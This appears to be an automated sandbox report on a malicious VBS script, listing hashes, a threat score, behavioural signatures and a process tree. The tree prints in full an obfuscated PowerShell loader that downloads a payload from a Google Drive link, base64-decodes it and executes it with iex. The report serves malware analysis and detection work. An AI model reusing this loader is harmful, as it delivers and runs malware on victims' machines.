Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
11/05/2024, 01:22
General
-
Target
566ce1820f0a4d18b33a018038e45d16f546306d818edcbeaef78ba782d821f3.vbs
-
Size
10KB
-
MD5
0fca203b5d60829c09249b35def80caf
-
SHA1
e29f20b57538717864749584beee0b4232c88189
-
SHA256
566ce1820f0a4d18b33a018038e45d16f546306d818edcbeaef78ba782d821f3
-
SHA512
330218f6fdf458f86b806bb89d5628089099654a5817c2f74dfdba79e4da50f9a519bab2aad304b0668c20dea0c52fa5a252d1d8070071c6a33106c87a236711
-
SSDEEP
192:FcAVHc1fEAcl6V9mF4Dg9KNXUCqY787f0n1zON9JUKSSBbAGq:FcNfEAcl6yFj9KREYkfb9/7q
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\566ce1820f0a4d18b33a018038e45d16f546306d818edcbeaef78ba782d821f3.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ammotherapy = 1;$Syrinkser='Su';$Syrinkser+='bstrin';$Syrinkser+='g';Function elektricitetsvrkets($Sammenflder){$Brugermodulers=$Sammenflder.Length-$ammotherapy;For($Ruddlemen=1;$Ruddlemen -lt $Brugermodulers;$Ruddlemen+=2){$Skejet+=$Sammenflder.$Syrinkser.Invoke( $Ruddlemen, $ammotherapy);}$Skejet;}function blizzardy($Backspaced){.($Trapezohedrons165) ($Backspaced);}$Brow=elektricitetsvrkets 'DMFoAzRiVlTl aS/F5,.H0. F( W.i,n d oTw.sI N Tu ,1K0 .F0 ; TWBi,nD6D4 ;, Ox 6.4.; RrTv :S1 2,1E.W0.) SG e cTk o / 2.0S1,0 0 1K0 1s EF ifrEe.fAoCx./S1 2G1B. 0R ';$Kampdrift=elektricitetsvrkets ' U sSe rT-DADg.eInRtS ';$strmpeholders=elektricitetsvrkets 'Fh tEt pPsA:,/,/Fd,rpiKv,e . gBoEo.g l eP. cCo m / u,c,?PeUx,p.oEr tR= d oSwSn lKo.aPdu& i dS= 1,q 1N1SSP0Sj I JDW Q 0,IVUMR,MKR YFk,A KSZMvGeFLMu X P 2I5 QM_MG, ';$hying=elektricitetsvrkets 'T>, ';$Trapezohedrons165=elektricitetsvrkets ',i,e,x. ';$Arnerne='Stivelseskornet';blizzardy (elektricitetsvrkets ' S e tO-SC o n t eHn.tR -.P a,tOh, TS: \kA,u.t o,sKoGm a t oOg.nDo s,t iKcW.AtMx tS D-EVFaHl uIe. M$KAUrAn,ePrBn e ;g ');blizzardy (elektricitetsvrkets ' iAf H(st eTsHtE-FpBa.t hR TTs: \LA uCt o sUo,m a,t oSgDn o s.t i c..HtBxHt.).{AeFx iSt.} ;S ');$Lysthuses89 = elektricitetsvrkets 'QeScAhSou %.aCpKp dXa,t aS%H\ OMp p e.g a,a e,n dOea.DK oRnU & &L e cCh,oE O$, ';blizzardy (elektricitetsvrkets ',$sg.lMo b a,l.:bWSoArAmbhAo l e.sM=A(Wc m,d /LcU I$SLOy,sPt,h,u s e.sd8 9R)B ');blizzardy (elektricitetsvrkets 'A$VgSl,otb a lD: UAdCs,pMrEg nIiInLg.e n,ss=,$ s.tFr mApCeEh o.l dAe,r s,.As pIl i,t ( $MhSy iwn gA) ');$strmpeholders=$Udsprgningens[0];blizzardy (elektricitetsvrkets '.$ g l oRb aUl : EOl.eUc tSr o.t,yNpUeAdA= NDeAwL-,O b.jBeIc,t US yCs.t.e m.. N e,t . WSe.bJCNl i.eDn.tF ');blizzardy (elektricitetsvrkets ' $.ECl e c.t rPo.t yMp.eSdB. HOe aSdTe,r sI[ $ K,a m,phdBrRiFf tP] = $CB r o,w ');$Estrif=elektricitetsvrkets 'NEAlReTckt r,oTt y pUeTdS. D.oTwGnDlAo aCdSFUiFl,eD(,$As.t.r mGp eTh oflAdRePr sC,.$cdNe m,oQgVrPa f i.)A ';$Estrif=$Wormholes[1]+$Estrif;$demografi=$Wormholes[0];blizzardy (elektricitetsvrkets 'N$ gllBoAbCa l :UL a,dSe nAs = (.T e s.t.-TPaa,tKh. T$IdNeUmIoIg r,aBf iT). ');while (!$Ladens) {blizzardy (elektricitetsvrkets ' $.gElSoIbUa.l :,B eCsCtCiOk k eRl i gHeSrBeFs.=A$ tLrDu eL ') ;blizzardy $Estrif;blizzardy (elektricitetsvrkets ' SCtRaSr.tT-IS l,e ePp. O4 ');blizzardy (elektricitetsvrkets ' $SgAl o.b,aSlS:VL.a dTeSnMs = (OTAeIs.tK-.Pda tDh t$DdIeNmNoSgDr.a f iS)O ') ;blizzardy (elektricitetsvrkets ' $,g lKoPbAa l.: EAkHsCh i.bEirt,iFo,nTi,sqmCe s 2A3p2S=T$ g l oIbFa,lM:.PMaHs t eRlRfIa,r vHeBdKe +,+ % $gU d s.p,r gLn iDn g e nosJ.Uc.oBu nStS ') ;$strmpeholders=$Udsprgningens[$Ekshibitionismes232];}$Typhloalbuminuria=335808;$Fagbiblioteker=25806;blizzardy (elektricitetsvrkets 'U$RgLl,o.bHaYl :.A l k o hGo.lpsBkHa,dNe t sK D=. BGLeUt -BC o nZt e,nAtU S$tdSeumAoRgSrUa,fHi ');blizzardy (elektricitetsvrkets 'I$,gRlPoPbIaKlG: F o,d.eHr e nPhGe.d s D=. B[.SkyJsHtBe.m,. CNo nTvSe rdt ] :,: F rSo.mKB aUsEeT6,4ASSt.r i nBg ( $VA l k oYhfoSlFs,kVaSd,eDtBs )A ');blizzardy (elektricitetsvrkets 'm$SgAl oTbBa.lL:UH.e.mti,c a,tKaSl eSp.s y =G [ SVyPs tSe,mS. TUeUx t .REUn.cOo,d iVnHg.]P:G:EA S CAI IV.JGMeIt,S.tSrOiMn gE(S$HF,o dFeRrme n.h e.dCsV)A ');blizzardy (elektricitetsvrkets 'T$ g.lBoUbpa l :PPArCeUeFr.uLp,tD=S$ H eHm.iUc aLtAa lNe pOsfy . szu bSs t rNi.n gR(R$FT ySpAhKl.onaDlrbnuNmCi,n uFr isaV,A$FF aSgSbai,bClUiMo.tVeSk eFrO)L ');blizzardy $Preerupt;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Oppegaaende.Kon && echo $"3⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB